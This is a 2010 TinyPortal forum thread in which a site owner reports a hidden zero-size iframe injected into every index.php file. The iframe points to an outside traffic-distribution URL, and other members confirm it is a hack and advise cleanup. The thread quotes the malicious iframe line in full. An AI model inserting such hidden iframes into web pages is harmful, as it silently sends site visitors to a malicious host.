TP-Docs
HTML5 Icon HTML5 Icon HTML5 Icon
TP on Social Media

Recent

User

Welcome to TinyPortal. Please login or sign up.

Stats

Members
  • Total Members: 3,963
  • Latest: BiZaJe
Stats
  • Total Posts: 195,917
  • Total Topics: 21,308
  • Online today: 884
  • Online ever: 8,223 (February 19, 2025, 04:35:35 AM)
Users Online
  • Users: 0
  • Guests: 360
  • Total: 360

TP Files in Control Panel

Started by Reality12, June 12, 2010, 08:04:10 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Print
Go Down Pages1
User actions

Reality12

June 12, 2010, 08:04:10 PM Last Edit: June 12, 2010, 10:32:50 PM by ~Alex
Hello TP,

While trying to figure out where to edit the social bookmarks for TP, I was randomly navigating around my control panel and have run into an oddity; please see attached.

As you'll see from the attached, I have some folders called tp-downloads, tp-files and tp-images.

First question: Are these true Tiny Portal folders?

Now, after you navigate into each folder, all of them have a sub-folder or more, with an index.php file. Take the directory "/tp-files/tp-articles/index.php" for instance; when I click edit, each one of those files has the following:

Code Select
<?php

exit;

?>

<iframe src=http://letsmusic.ru/tds/go.php?sid=3 width=0 height=0 style="display:none"></iframe>

This has me a little concerned, as I don't believe TP is associated with the named website above.

Question two: Is it safe to say this is a hack?

If these aren't TP folders, can someone advise on how to proceed?

JPDeni

#1
June 12, 2010, 09:47:13 PM
This is not a hack. Those are real directories that are used for various things. The index.php files that you see there are just so that someone can't call up the directory and get a listing of the files.

However, the iframe that was added is evidence of a hacker being on your system. I would create a file with just

Code Select

<?php

exit;

?>


on it and save it to all of the files where you see that iframe code. Check the index.php files in every directory, because you may find it there also. Also, if you haven't already, tell your webhost about it. It may be that other sites that use the same server were also attacked.

Lesmond

#2
June 12, 2010, 10:19:33 PM
I agree with JP sounds like a hacker too, also do a scan on your pc for Trojans and viruses too!!

Reality12

#3
June 12, 2010, 10:32:36 PM
Glad to know. I'll work on that and inform the host as well.

Thank you!

Reality12

#4
June 12, 2010, 11:59:00 PM
Just got done, and thought I'd share that I got curious and checked other folders.

...Found out that whatever this was, attacked all 'index.' files in every directory.

I've cleared them out, but wow!  :o

JPDeni

#5
June 13, 2010, 01:05:17 AM
I had something like that a few weeks ago. It hit my account (every index.php and index.html file in four domain names) and all of the other sites that were hosted on the server. Good job for catching it.
Print
Go Up Pages1
User actions

This website is proudly hosted on Crocweb Cloud Website Hosting.